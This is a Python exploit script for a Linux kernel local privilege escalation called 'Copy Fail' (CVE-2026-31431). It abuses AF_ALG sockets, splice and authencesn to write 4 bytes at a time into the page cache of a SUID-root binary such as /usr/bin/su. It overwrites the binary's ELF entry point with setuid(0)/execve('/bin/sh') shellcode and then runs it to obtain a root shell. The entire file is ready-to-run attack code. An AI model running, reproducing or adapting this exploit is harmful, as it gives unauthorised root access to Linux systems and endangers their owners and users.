#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CVE-2026-31431 "Copy Fail" — Universal LPE Exploit
Linux kernel page cache 4-byte arbitrary write via AF_ALG splice + authencesn

Dynamic ELF entry point offset calculation — works on any SUID-root x86_64 binary.

Reference: https://github.com/theori-io/copy-fail-CVE-2026-31431

Compatible with Python 3.x (requires AF_ALG socket support).
"""

from __future__ import print_function
import os
import socket
import struct
import sys
import binascii
import ctypes
import ctypes.util

AF_ALG = 38
SOCK_SEQPACKET = 5
SOL_ALG = 279

# --- splice compat: Python < 3.10 has no os.splice ---
if not hasattr(os, "splice"):
    _libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)

    def _splice(src, dst, count, offset_src=None, offset_dst=None, flags=0):
        ctypes.set_errno(0)
        pi = ctypes.byref(ctypes.c_longlong(offset_src)) if offset_src is not None else None
        po = ctypes.byref(ctypes.c_longlong(offset_dst)) if offset_dst is not None else None
        r = _libc.splice(
            ctypes.c_int(src), pi,
            ctypes.c_int(dst), po,
            ctypes.c_size_t(count), ctypes.c_uint(flags),
        )
        if r == -1:
            raise OSError(ctypes.get_errno(), "splice failed")
        return r

    os.splice = _splice


def _hex(h):
    """Compatibility wrapper for hex decoding (Python 2/3)."""
    if isinstance(h, str):
        h = h.encode("ascii")
    return binascii.unhexlify(h)


def copy_fall_write(target, file_offset, payload):
    """
    Write 4 bytes to page cache at (target_file, file_offset).

    Abuse AF_ALG algif_aead in-place decryption:
    splice() pins a page cache page, authencesn writes 4-byte seqno_lo
    at a controlled offset after the auth tag.
    """
    s = socket.socket(AF_ALG, SOCK_SEQPACKET, 0)
    s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    s.setsockopt(SOL_ALG, 1, _hex("0800010000000010" + "0" * 64))
    s.setsockopt(SOL_ALG, 5, None, 4)
    ctx, _ = s.accept()
    zero = _hex("00")
    ctx.sendmsg(
        [b"A" * 4 + payload],
        [
            (SOL_ALG, 3, zero * 4),
            (SOL_ALG, 2, b"\x10" + zero * 19),
            (SOL_ALG, 4, b"\x08" + zero * 3),
        ],
        32768,
    )
    r, w = os.pipe()
    fd = os.open(target, os.O_RDONLY)
    os.splice(fd, w, file_offset + 4, offset_src=0)
    os.splice(r, ctx.fileno(), file_offset + 4)
    try:
        ctx.recv(8 + file_offset)
    except Exception:
        pass
    for x in [fd, r, w]:
        os.close(x)
    ctx.close()
    s.close()


def parse_elf_entry_offset(filepath):
    """
    Calculate the file offset of the ELF entry point (e_entry).

    Walk PT_LOAD segments to find the one containing e_entry:
        file_offset = p_offset + (e_entry - p_vaddr)
    """
    with open(filepath, "rb") as f:
        hdr = f.read(64)
    e_entry = struct.unpack_from("<Q", hdr, 24)[0]
    e_phoff = struct.unpack_from("<Q", hdr, 32)[0]
    e_phnum = struct.unpack_from("<H", hdr, 56)[0]
    e_phentsize = struct.unpack_from("<H", hdr, 54)[0]
    with open(filepath, "rb") as f:
        for i in range(e_phnum):
            f.seek(e_phoff + i * e_phentsize)
            ph = f.read(e_phentsize)
            if struct.unpack_from("<I", ph, 0)[0] != 1:  # PT_LOAD
                continue
            p_offset = struct.unpack_from("<Q", ph, 8)[0]
            p_vaddr = struct.unpack_from("<Q", ph, 16)[0]
            p_filesz = struct.unpack_from("<Q", ph, 32)[0]
            if p_vaddr <= e_entry < p_vaddr + p_filesz:
                return p_offset + (e_entry - p_vaddr)
    raise RuntimeError("PT_LOAD segment containing entry point not found")


# setuid(0) + execve("/bin/sh") — 36 bytes
SHELLCODE = (
    b"\x48\x31\xff"  # xor rdi, rdi
    b"\x31\xc0"  # xor eax, eax
    b"\xb0\x69"  # mov al, 0x69 (setuid)
    b"\x0f\x05"  # syscall
    b"\x48\x31\xd2"  # xor rdx, rdx
    b"\x52"  # push rdx
    b"\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"  # movabs rbx, "/bin/sh\0"
    b"\x53"  # push rbx
    b"\x48\x89\xe7"  # mov rdi, rsp
    b"\x48\x31\xf6"  # xor rsi, rsi
    b"\x31\xc0"  # xor eax, eax
    b"\xb0\x3b"  # mov al, 0x3b (execve)
    b"\x0f\x05"  # syscall
)


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <suid-binary>  (e.g., /usr/bin/su)")
        sys.exit(1)

    target = sys.argv[1]
    entry_offset = parse_elf_entry_offset(target)
    print(f"[*] Target: {target}")
    print(f"[*] ELF entry file offset: 0x{entry_offset:x}")

    sc = SHELLCODE
    if len(sc) % 4:
        sc += b"\x00" * (4 - len(sc) % 4)
    print(f"[*] Shellcode: {len(SHELLCODE)} bytes, {len(sc) // 4} writes")

    for i in range(len(sc) // 4):
        chunk = sc[i * 4 : i * 4 + 4]
        off = entry_offset + i * 4
        copy_fall_write(target, off, chunk)
        print(f"    [+] 0x{off:06x}: {chunk.hex()}")

    with open(target, "rb") as f:
        f.seek(entry_offset)
        written = f.read(len(sc))
    print(f"[*] Verify: {written[:len(SHELLCODE)].hex()}")

    print(f"[*] Executing {target}...")
    os.system(target)


if __name__ == "__main__":
    main()